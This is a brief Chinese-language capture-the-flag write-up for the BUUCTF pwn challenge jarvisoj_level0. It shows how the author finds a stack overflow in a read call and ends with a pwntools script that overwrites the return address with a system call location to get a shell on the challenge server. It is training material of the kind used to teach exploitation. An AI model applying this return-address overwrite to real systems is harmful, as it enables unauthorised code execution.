[BUUCTF-pwn]——jarvisoj_level0

• 題目地址：https://buuoj.cn/challenges#jarvisoj_level0
• 題目：
  還是先下載下來在Linux上checksex一下，基本確實又是棧溢出了。
  
  64位，所以我們用64位的IDA打開，沒什么有用的信息，點開vulnerable_function函數
  
  發現棧溢出的read函數，前面為0意味著標準讀入，后面的長度也可以。沒毛病就是這個地方了。
  
  再翻翻其他函數，發現了我們想要的system函數。找到位置，和需要覆蓋的返回地址。看過我之前的博文的人都知道，我比較喜歡system壓參的位置。
  
  
  再看看buf這個局部變量，先想要覆蓋需要0x80 + 0x8的距離

expolit

from pwn import * p = remote("node3.buuoj.cn",xxxx) ret_arr = 0X40059A payload = 'a'*(0x80 + 0x8) + p64(ret_arr) p.sendline(payload) p.interactive()

點贊點贊點贊，兄弟們、姐妹們、家人們！！！ 😃

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level0的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。